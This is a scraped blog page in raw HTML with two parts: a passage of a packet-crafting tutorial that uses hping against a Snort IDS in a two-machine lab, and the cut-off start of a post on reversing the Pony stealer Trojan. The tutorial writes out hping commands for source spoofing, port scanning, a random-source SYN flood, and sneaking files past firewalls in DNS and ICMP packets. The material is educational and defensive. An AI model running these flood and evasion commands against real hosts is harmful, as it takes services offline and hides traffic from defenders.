<span style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: 700; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">Packet Analysis:</span> The sent packets are received by the attacker and they are analyzed to extract the information. Various sniffing tools like Wireshark, tcpdump, dsniff, etc. are used for this purpose. This step gives a route to the targeted system, or at least gives attackers enough data to tune up the attack.<span style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: 700; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">Tools For Packet Crafting: </span><span style="font-family: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: 25.9px;">Hping, Nemesis, Netcat, Scapy, Socat</span></div>
<div style="border: 0px; box-sizing: border-box; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
Let’s carry out a test to understand the creation and working of a crafted packet and its effect on a firewall.</div>
<div style="border: 0px; box-sizing: border-box; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
<span style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: 700; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">Test Requirements</span></div>
<ul style="border: 0px; box-sizing: border-box; font-stretch: inherit; line-height: 25.9px; list-style: disc; margin: 0px 1.5em 1.5em; padding: 0px; vertical-align: baseline;">
<li style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;"><div style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">
Two Machines (One with Hping and Other with Snort installed).</div>
</li>
<li style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;"><div style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">
Working connection between two machines.</div>
</li>
</ul>
<div style="border: 0px; box-sizing: border-box; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
<span style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: 700; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">Hping</span></div>
<div style="border: 0px; box-sizing: border-box; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
This is a utility that helps us to assemble and send ICMP, UDP or TCP packets and then display the results. It’s similar to the ping command, but it offers far more options to customize the packet to be sent. This helps to map the firewall set rules of a targeted system.</div>
<div style="border: 0px; box-sizing: border-box; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
<span style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: 700; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">Snort</span></div>
<div style="border: 0px; box-sizing: border-box; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
Sort is a free network intrusion detection and prevention software. It helps us to carry out real time traffic analysis packet logging, protocol analysis, content searching, etc. on a network.</div>
<div style="border: 0px; box-sizing: border-box; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
<span style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: 700; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">Testing</span></div>
<div style="border: 0px; box-sizing: border-box; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; text-align: center; vertical-align: baseline;">
<img alt="" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/031715_1441_PacketCraft1.jpg" style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; max-width: 100%; padding: 0px; vertical-align: baseline;" /></div>
<div style="border: 0px; box-sizing: border-box; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; text-align: center; vertical-align: baseline;">
<span style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: 700; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">Figure 1: Packet Crafting test setup</span></div>
<div style="border: 0px; box-sizing: border-box; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
Now we are going to check how a packet can be crafted from a system using Hping, and how it can be customized to be invisible in a network. We are using Snort as the IDS in the target machine. This could prove that packet crafting is a serious issue that should be studied to prevent attacks.</div>
<div style="border: 0px; box-sizing: border-box; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
Firstly install Hping on the source machine. It’s a command line multi-platform software. We are using two Linux machines for the test. The installation package could be downloaded from various websites. The next step is to install the intrusion detection software at the destination end. Download the latest version Snort with Winpcap and install it on the machine. Winpcap is a driver that helps in collecting packets. After setting up two machines, establish a connection between the two machines to transfer the packets. Check the connection before sending the packets.</div>
<div style="border: 0px; box-sizing: border-box; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
These are the steps to setup the test environment. Now we have to craft the packet using Hping. In Hping there are various arguments to modify the packet to be sent according to the requirement. These could be obtained from the manual page of Hping. Before sending the packet, determine the address of the target machine. Here it is 192.168.0.10. Now write the command for packet creation.</div>
<div style="border: 0px; box-sizing: border-box; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
Hping is a command line software. For creating the packets, the commands should be given in a perfect way so that the packet penetrates into the targeted system without being detected. An example is given below:</div>
<div style="border: 0px; box-sizing: border-box; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; margin-left: 36pt; padding: 0px; vertical-align: baseline;">
<span style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: 700; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">hping 192.168.0.10 –udp –spoof 192.168.1.150</span></div>
<div style="border: 0px; box-sizing: border-box; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
The packets are sent to the UDP port of machine 192.168.0.10 with a spoofed source IP of 192.168.1.150.</div>
<div style="border: 0px; box-sizing: border-box; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; text-align: center; vertical-align: baseline;">
<img alt="" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/031715_1441_PacketCraft2.jpg" style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; max-width: 100%; padding: 0px; vertical-align: baseline;" /></div>
<div style="border: 0px; box-sizing: border-box; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; text-align: center; vertical-align: baseline;">
<span style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: 700; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">Figure 2: Spoofing to UDP port.</span></div>
<div style="border: 0px; box-sizing: border-box; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; text-align: center; vertical-align: baseline;">
<img alt="" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/031715_1441_PacketCraft3.jpg" style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; max-width: 100%; padding: 0px; vertical-align: baseline;" /></div>
<div style="border: 0px; box-sizing: border-box; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; text-align: center; vertical-align: baseline;">
<span style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: 700; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">Figure 3: Spoofed address on target system hiding original address</span></div>
<div style="border: 0px; box-sizing: border-box; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
Packet crafting could be used to carry out DOS attacks to a targeted machine. This could be done by flooding packets to a predetermined port. The number of packets reaching the port is beyond the managing capacity of that port. This results in the failure of the system and finally becomes non-responsive to any request made to that particular system.</div>
<div class="main post-col-2-3" style="border: 0px; box-sizing: border-box; float: left; font-family: inherit; font-size: 16px; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; max-width: 670px; padding: 0px; vertical-align: baseline; width: 670px;">
<article class="post-content" style="background: rgb(255, 255, 255); border: 0px; box-sizing: border-box; float: left; font-family: inherit; font-size: 14px; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: 1.85em; margin: 0px; padding: 50px 45px 36px; vertical-align: baseline; width: 670px;"><div style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
Before sending a packet to the system Hping could be used to carry out a port scan. This helps the attacker to get the information on available open ports to carry out attack easily. The weakest port is selected to gain access to the system.</div>
<div style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin-bottom: 1em; margin-left: 72pt; padding: 0px; vertical-align: baseline;">
<span style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: 700; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;"><em style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">hping3 -S 192.168.0.10 -p 80 -c 2</em></span></div>
<div style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
This command scans port number 80 of machine with IP 192.168.0.10. There are even commands to scan the complete ports in a machine. This will give the attacker the complete status of the ports in a system.</div>
<div style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin-bottom: 1em; margin-left: 36pt; padding: 0px; vertical-align: baseline;">
<span style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: 700; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">hping 192.168.0.10 –S -p 22 –rand-source –flood</span></div>
<div style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
This command floods the port number 22 of the mentioned machine. As the flooding starts, the machine becomes non responsive. When the flooding is stopped, the machine comes back to its normal state.</div>
<div style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin-bottom: 1em; padding: 0px; text-align: center; vertical-align: baseline;">
<img alt="" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/031715_1441_PacketCraft4.jpg" style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; max-width: 100%; padding: 0px; vertical-align: baseline;" /></div>
<div style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin-bottom: 1em; padding: 0px; text-align: center; vertical-align: baseline;">
<span style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: 700; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">Figure 4: Command for flooding a machine</span></div>
<div style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin-bottom: 1em; padding: 0px; text-align: center; vertical-align: baseline;">
<img alt="" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/031715_1441_PacketCraft5.jpg" style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; max-width: 100%; padding: 0px; vertical-align: baseline;" /></div>
<div style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin-bottom: 1em; padding: 0px; text-align: center; vertical-align: baseline;">
<span style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: 700; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">Figure 5: Result displayed by Snort after flooding.</span></div>
<div style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
We can see from the above image that a large number of packets have been dumped to the targeted machine within a small amount of time. The IDS software does not detect the packets while the flooding is in process. But as soon as the flooding is stopped, Snort displays only the number of packets received. The traffic created by flooding the packets cannot be handled by the system and becomes non-responsive. No Signatures are generated during the process.</div>
<div style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
<span style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: 700; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">DNS and ICMP Packet Crafting</span></div>
<div style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
Domain Name System is the system responsible for resolving domain names. DNS uses ports 53 UDP for normal operations and can enlist port 53 TCP for zone transfers and other oversized replies. Once the address is entered into the URL, the browser will try to resolve the IP. If the address is not known, then a DNS request will be sent to the DNS server configured on the client. We could craft such a packet using Hping so that the firewall does not block the packet.</div>
<div style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin-bottom: 1em; padding: 0px; text-align: center; vertical-align: baseline;">
<span style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: 700; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">hping -2 –p 53 -E data.dns -d 31 192.168.0.10</span></div>
<div style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
Here the packet is sent to the port number 53 of the target (192.168.0.10), with the packet containing a file called “data.dns”. The packet size has also been specified as 31.</div>
<div style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin-bottom: 1em; padding: 0px; text-align: center; vertical-align: baseline;">
<img alt="" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/031715_1441_PacketCraft6.jpg" style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; max-width: 100%; padding: 0px; vertical-align: baseline;" /></div>
<div style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin-bottom: 1em; padding: 0px; text-align: center; vertical-align: baseline;">
<span style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: 700; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">Figure 6: Sending a file to target’s DNS port</span></div>
<div style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
When sending a data file through Hping, the IDS used in the target’s machine does not detect the presence of the attached file. It only displays the total number of packets transmitted and received. Even tough it shows unreachable, the packets are received at the target location.</div>
<div style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
Hping can also be used to send ICMP (Internet Control Message Protocol) packets. ICMP packets are usually used to troubleshoot networks and for gathering basic information. These packets could be used to check whether a host is alive or not. In most of the firewalls, packets like ICMP and DNS request have the ability to pass by. These crafted ICMP packets helps us to pass through the firewall. At the senders end, we have to specify the type of packet, destination and other details for proper communication.</div>
<div style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
<span style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: 700; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">hping 192.168.0.11 –d 100 –icmp –file /data.dns</span></div>
<div style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
Here the file “data.dns” is sent to the target 192.168.0.11 using an ICMP packet.</div>
<div style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin-bottom: 1em; padding: 0px; text-align: center; vertical-align: baseline;">
<img alt="" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/031715_1441_PacketCraft7.jpg" style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; max-width: 100%; padding: 0px; vertical-align: baseline;" /></div>
<div style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin-bottom: 1em; padding: 0px; text-align: center; vertical-align: baseline;">
<span style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: 700; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">Figure 7: File sent using ICMP packet</span></div>
<div style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
Using such crafted packets, a traffic firewall could be breached. From the above test, we can agree to the fact that packet crafting is a serious issue that should be taken care of.</div>
<div style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
<span style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: 700; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">References</span></div>
<ul style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; list-style: disc; margin: 0px 1.5em 1.5em; padding: 0px; vertical-align: baseline;">
<li style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;"><div style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">
<a href="http://www.thegeekstuff.com/2010/08/snort-tutorial/" style="border: 0px; box-sizing: border-box; color: #297aa0; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;"><span style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">http://www.thegeekstuff.com/2010/08/snort-tutorial/</span></a></div>
</li>
<li style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;"><div style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">
<a href="http://linuxhelp-kavanathai.blogspot.in/2011/08/installing-and-configuring-snort-on.html" style="border: 0px; box-sizing: border-box; color: #297aa0; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;"><span style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">http://linuxhelp-kavanathai.blogspot.in/2011/08/installing-and-configuring-snort-on.html</span></a></div>
</li>
<li style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;"><div style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">
<a href="http://www.opensourceforu.com/2012/05/cyber-attacks-explained-packet-crafting/" style="border: 0px; box-sizing: border-box; color: #297aa0; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;"><span style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">http://www.opensourceforu.com/2012/05/cyber-attacks-explained-packet-crafting/</span></a></div>
</li>
<li style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;"><div style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">
<a href="http://www.valencynetworks.com/articles/cyber-security-attacks-packet-crafting.html" style="border: 0px; box-sizing: border-box; color: #297aa0; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;"><span style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">http://www.valencynetworks.com/articles/cyber-security-attacks-packet-crafting.html</span></a></div>
</li>
<li style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;"><div style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">
<a href="http://linuxpoison.blogspot.in/2008/10/tools-for-creating-tcpip-packets.html" style="border: 0px; box-sizing: border-box; color: #297aa0; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;"><span style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">http://linuxpoison.blogspot.in/2008/10/tools-for-creating-tcpip-packets.html</span></a></div>
</li>
<li style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;"><div style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">
<a href="http://www.securitybistro.com/?p=8881" style="border: 0px; box-sizing: border-box; color: #297aa0; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;"><span style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">http://www.securitybistro.com/?p=8881</span></a></div>
</li>
</ul>
<div class="ig_inline_container ig_the_content ig_after" style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">
</div>
<div class="share vertical" style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 18px 0px 0px; vertical-align: baseline;">
<ul style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; list-style: disc; margin: 0px 1.5em 1.5em; padding: 0px; vertical-align: baseline;"><br /></ul>
</div>
</article></div>
<ul class="random-posts " style="border: 0px; box-sizing: border-box; clear: both; font-family: inherit; font-size: 0px; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; list-style: none; margin: 0px; padding: 50px 0px 0px; text-align: center; vertical-align: baseline; width: 980px;"><span style="background-color: #e7f0f3; color: black; line-height: 0px;"><div>
<span style="background-color: #e7f0f3; color: black; line-height: 0px;"><br /></span></div>
</span>
<li style="background-color: #555555; background-image: url("http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads//010416_1204_DomainBased1-237x237-c-default.png"); border: 0px; box-sizing: border-box; color: black; display: inline-block; font-size: 22px; font-stretch: inherit; line-height: 1.333; margin: 0px 5px; padding: 0px; position: relative; vertical-align: baseline; width: 237px;"></li>
</ul>
</li>
<li style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;"><div style="border: 0px; box-sizing: border-box; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
<br /></div>
</li>
</ul>
</div>
Anonymoushttp://www.blogger.com/profile/14161834164641471363noreply@blogger.com0tag:blogger.com,1999:blog-185877282583432766.post-44336536274579363742015-12-31T14:56:00.000+05:302015-12-31T14:56:08.284+05:30Pony Trojan reversing (part-II)<div dir="ltr" style="text-align: left;" trbidi="on">
Pony is a stealer Trojan and has been active for quite a while now. It was responsible for stealing over $200,000 in bitcoins ( <a href="https://threatpost.com/latest-instance-of-pony-botnet-pilfers-200k-700k-credentials/104463/"><span style="color: navy; text-decoration: underline;">https://threatpost.com/latest-instance-of-pony-botnet-pilfers-200k-700k-credentials/104463/</span></a>) . In this post, we will try to cover statically reversing the Pony Trojan.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://pre00.deviantart.net/d4c5/th/pre/i/2015/299/d/a/inktober_21st_by_trojan_pony-d9ehl52.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://pre00.deviantart.net/d4c5/th/pre/i/2015/299/d/a/inktober_21st_by_trojan_pony-d9ehl52.jpg" height="320" width="238" /></a></div>
<br />
Tools required <br />
<ol>
<li>Vmware</li>
<li>IDA Disassembler</li>
<li>ollydbg Debugger</li>
<li>Hex editor</li>
</ol>
If you haven’t gone through Part I, we recommend you go through Part I before reading this.<br />
In this post, we are going to examine the command and controls traffic and we are going to analyse statically the binary<br />
Let’s look at the pcap traffic<br />
<span style="font-family: Courier New;">POST /gate.php HTTP/1.0<br />
</span><br />
